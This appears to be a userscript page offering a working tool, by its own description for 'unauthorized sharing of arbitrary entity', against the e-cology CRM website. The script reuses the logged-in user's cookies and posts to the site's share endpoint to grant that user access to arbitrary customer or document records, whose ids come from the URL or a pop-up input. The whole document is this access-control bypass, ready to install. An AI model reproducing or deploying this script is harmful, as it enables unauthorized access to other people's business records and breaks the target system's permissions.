e-cology Unauthorized Get Permissions

Unauthorized sharing of arbitrary entity

当前为 2024-08-29 提交的版本,查看 最新版本

  1. // ==UserScript==
  2. // @name e-cology Unauthorized Get Permissions
  3. // @namespace http://tampermonkey.net/
  4. // @version 0.5
  5. // @description Unauthorized sharing of arbitrary entity
  6. // @author Douglas Lee
  7. // @match https://www.e-cology.com.cn/*
  8. // @grant GM_xmlhttpRequest
  9. // @grant GM_getValue
  10. // @grant GM_setValue
  11. // @grant GM_cookie
  12. // @grant GM_addStyle
  13. // @run-at document-end
  14. // @connect www.e-cology.com.cn
  15. // ==/UserScript==
  16.  
  17. (function() {
  18. 'use strict';
  19.  
  20. let urlPatterns = [
  21. /customerViewPage\/(\d+)__targetId=/,
  22. /docDetail\/(\d+)$/
  23. ];
  24.  
  25. let entityIds = '';
  26. for (let pattern of urlPatterns) {
  27. let match = window.location.href.match(pattern);
  28. if (match) {
  29. entityIds = match[1];
  30. break;
  31. }
  32. }
  33.  
  34. function getSid(callback) {
  35. GM_cookie('list', { url: 'https://www.e-cology.com.cn/' }, function(cookies) {
  36. let cookieString = cookies.map(cookie => `${cookie.name}=${cookie.value}`).join('; ');
  37.  
  38. GM_xmlhttpRequest({
  39. method: "GET",
  40. url: "https://www.e-cology.com.cn/api/hrm/card/getCurrentSimpleEmployee",
  41. headers: {
  42. "Content-Type": "application/json;charset=UTF-8",
  43. "Cookie": cookieString,
  44. "Accept": "application/json, text/plain, */*"
  45. },
  46. onload: function(response) {
  47. let jsonResponse = JSON.parse(response.responseText);
  48. if (jsonResponse && jsonResponse.data && jsonResponse.data.id) {
  49. callback(jsonResponse.data.id);
  50. }
  51. }
  52. });
  53. });
  54. }
  55.  
  56. window.getPermissions = function(entityIds) {
  57. getSid(function(sid) {
  58. GM_cookie('list', { url: 'https://www.e-cology.com.cn/' }, function(cookies) {
  59. let cookieString = cookies.map(cookie => `${cookie.name}=${cookie.value}`).join('; ');
  60.  
  61. let data = {
  62. "departmentIds": "",
  63. "entityIds": entityIds,
  64. "groupIds": "",
  65. "module": "customer",
  66. "shareType": "sharer",
  67. "sids": `${sid},`
  68. };
  69.  
  70. GM_xmlhttpRequest({
  71. method: "POST",
  72. url: "https://www.e-cology.com.cn/api/crm/common/share/shareAll.common",
  73. headers: {
  74. "Content-Type": "application/json;charset=UTF-8",
  75. "Cookie": cookieString,
  76. "Accept": "application/json, text/plain, */*"
  77. },
  78. data: JSON.stringify(data),
  79. onload: function(response) {
  80. location.reload();
  81. },
  82. onerror: function(error) {
  83. alert('An error occurred: ' + error.statusText);
  84. }
  85. });
  86. });
  87. });
  88. };
  89.  
  90. // 添加浮动按钮
  91. let button = document.createElement('button');
  92. button.innerHTML = 'get Permissions';
  93. button.style.position = 'fixed';
  94. button.style.right = '10px';
  95. button.style.bottom = '50px';
  96. button.style.zIndex = '1000';
  97. button.style.backgroundColor = '#4CAF50';
  98. button.style.color = 'white';
  99. button.style.border = 'none';
  100. button.style.padding = '10px';
  101. button.style.cursor = 'pointer';
  102. document.body.appendChild(button);
  103.  
  104. // 创建弹出框
  105. let modal = document.createElement('div');
  106. modal.style.display = 'none';
  107. modal.style.position = 'fixed';
  108. modal.style.right = '10px';
  109. modal.style.bottom = '50px';
  110. modal.style.zIndex = '1000';
  111. modal.style.backgroundColor = 'white';
  112. modal.style.padding = '20px';
  113. modal.style.boxShadow = '0px 0px 10px rgba(0, 0, 0, 0.1)';
  114. document.body.appendChild(modal);
  115.  
  116. let entityIdsInput = document.createElement('input');
  117. entityIdsInput.placeholder = 'Enter entityIds';
  118. entityIdsInput.style.width = '100%';
  119. entityIdsInput.style.marginBottom = '10px';
  120. modal.appendChild(entityIdsInput);
  121.  
  122. let submitButton = document.createElement('button');
  123. submitButton.innerHTML = 'Get Permissions';
  124. submitButton.style.backgroundColor = '#008CBA';
  125. submitButton.style.color = 'white';
  126. submitButton.style.border = 'none';
  127. submitButton.style.padding = '10px';
  128. submitButton.style.cursor = 'pointer';
  129. modal.appendChild(submitButton);
  130.  
  131. // 显示/隐藏弹出框
  132. button.addEventListener('click', function(event) {
  133. event.preventDefault();
  134. event.stopPropagation();
  135. if (entityIds) {
  136. window.getPermissions(entityIds);
  137. } else {
  138. // 如果未匹配到URL,则展开弹出框
  139. modal.style.display = modal.style.display === 'none' ? 'block' : 'none';
  140. }
  141. });
  142.  
  143. // 发送POST请求
  144. submitButton.addEventListener('click', function(event) {
  145. event.preventDefault();
  146. event.stopPropagation();
  147. entityIds = entityIdsInput.value;
  148. window.getPermissions(entityIds);
  149. });
  150. })();